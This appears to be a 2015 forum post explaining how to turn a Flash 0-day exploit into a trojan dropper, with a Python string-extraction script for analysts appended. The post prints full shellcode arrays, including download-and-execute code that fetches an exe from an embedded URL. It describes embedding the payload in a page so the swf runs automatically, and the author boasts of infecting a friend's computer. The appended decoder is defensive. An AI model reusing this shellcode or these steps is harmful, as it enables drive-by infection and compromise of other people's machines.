Flash 0day exploitation

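Posted on 2015-7-30 18:01:04
Approach:
Generate shellcode with msf (the download-and-exec kind, exploiting a certain vulnerability on Windows).
Then replace the part of the source that pops the calculator with your own exe file.
After the shellcode runs it downloads the exe file, and the machine is then infected with the trojan~
The test worked at the time, and I wrecked a buddy's computer with it~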

File to modify: ShellWin32.as
Original shellcode:
  1. 0x83EC8B55, 0x5153ACC4, 0x058B6457, 0x00000030, 0x8B0C408B, 0x008B0C40, 0x588B008B, 0x03D88918,
  2.                                 0x508B3C40, 0x8BDA0178, 0xDF01207A, 0x078BC931, 0x3881D801, 0x61657243, 0x78811C75, 0x4173730B,
  3.                                 0x8B137500, 0xD8012442, 0x4804B70F, 0x011C528B, 0x821C03DA, 0xC78309EB, 0x4A3B4104, 0x8DCF7C18,
  4.                                 0x8D50F045, 0x3157AC7D, 0x0011B9C0, 0xABF30000, 0x44AC45C7, 0x50000000, 0x50505050, 0x0009E850,
  5.                                 0x61630000, 0x652E636C, 0x50006578, 0x595FD3FF, 0x03E0C15B, 0xC906C083, 0x909090C3

This pops the calculator; it is hexadecimal, in groups of 8 digits.

After modification:
  1. 0x8B64C933,0x408B3041,0x14708B0C,0x8BAD96AD,0x538B1058,0x8BD3033C,0xD3037852,0x0320728B,
  2.       0x41C933F3,0x81C303AD,0x74654738,0x81F47550,0x6F720478,0xEB754163,0x64087881,0x75657264,
  3.       0x24728BE2,0x8B66F303,0x8B494E0C,0xF3031C72,0x038E148B,0x51C933D3,0x78652e68,0x646c6865,
  4.       0x62687a68,0x686d7379,0x65646f63,0x6c656868,0x7773686c,0x52537366,0x72616851,0x4C684179,
  5.       0x68726269,0x64616F4C,0xD2FF5354,0x590CC483,0xB9665150,0x68516C6C,0x642E6E6F,0x6C727568,
  6.       0xD0FF546D,0x8B10C483,0x33042454,0xB96651C9,0x33514165,0x466F68C9,0x6F686C69,0x68546461,
  7.       0x6C6E776F,0x4C525568,0xFF505444,0x8DC933D2,0x51242454,0x47EB5251,0x83D0FF51,0xC9331CC4,
  8.       0x52535B5A,0x65786851,0x4C886163,0x57680324,0x54456E69,0x6AD2FF53,0x244C8D05,0xD0FF5118,
  9.       0x5A0CC483,0x7365685B,0x6C836173,0x68610324,0x636F7250,0x69784568,0xFF535474,0xE8D0FFD2,
  10.       0xFFFFFFB4,
  11.       //url http://192.168.1.111/123.exe\00
  12.       0x70747468,0x312f2f3a,0x312e3239,0x302e3836,0x3730312e,0x3830383a,0x32312f31,0x78652e33,0x65,0x00


The upper part is the download-and-exec code; the lower part is the trojan's address.

Then compile it and change the submit in the HTML so that it runs the swf directly; after that it is up to how creative you get~~
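
For analysts triaging a sample like the one in this post: the arrays are 32-bit words stored little-endian, so an embedded string such as the download URL can be recovered statically from the ActionScript source. The following is an added example, not code from the original post; the sample array, the `.invalid` host and the function names are constructed for illustration.

```python
import re
import struct

# Constructed sample, not the post's payload: two filler words, then an ASCII
# string packed the same way, pointing at a reserved .invalid host.
SAMPLE_AS3 = """
    0x90909090, 0xFFFFFFB4,
    //url (constructed)
    0x70747468, 0x652f2f3a, 0x706d6178, 0x692e656c,
    0x6c61766e, 0x612f6469, 0x6578652e, 0x00
"""

HEX_WORD = re.compile(r"0x([0-9A-Fa-f]{1,8})\b")
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{6,}")   # ASCII runs of 6+ bytes
URL = re.compile(rb"https?://[\x21-\x7e]+")       # stops at NUL or space


def dwords_to_bytes(source: str) -> bytes:
    """Return the bytes a comma-separated 0x... uint list occupies in memory."""
    out = bytearray()
    for line in source.splitlines():
        code = line.split("//", 1)[0]             # ignore source comments
        for digits in HEX_WORD.findall(code):
            # Every array element is a full 32-bit word, even a short 0x65.
            out += struct.pack("<I", int(digits, 16))
    return bytes(out)


def extract_indicators(source: str) -> dict:
    """Pull printable strings and URLs out of the decoded byte stream."""
    raw = dwords_to_bytes(source)
    strings = [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(raw)]
    urls = [m.group().decode("ascii") for m in URL.finditer(raw)]
    return {"size": len(raw), "strings": strings, "urls": urls}


if __name__ == "__main__":
    print(extract_indicators(SAMPLE_AS3))
```

Strings that shellcode assembles on the stack with immediate pushes are interleaved with opcode bytes, so they appear fragmented in the `strings` list; a string stored contiguously, like a trailing URL, comes out whole.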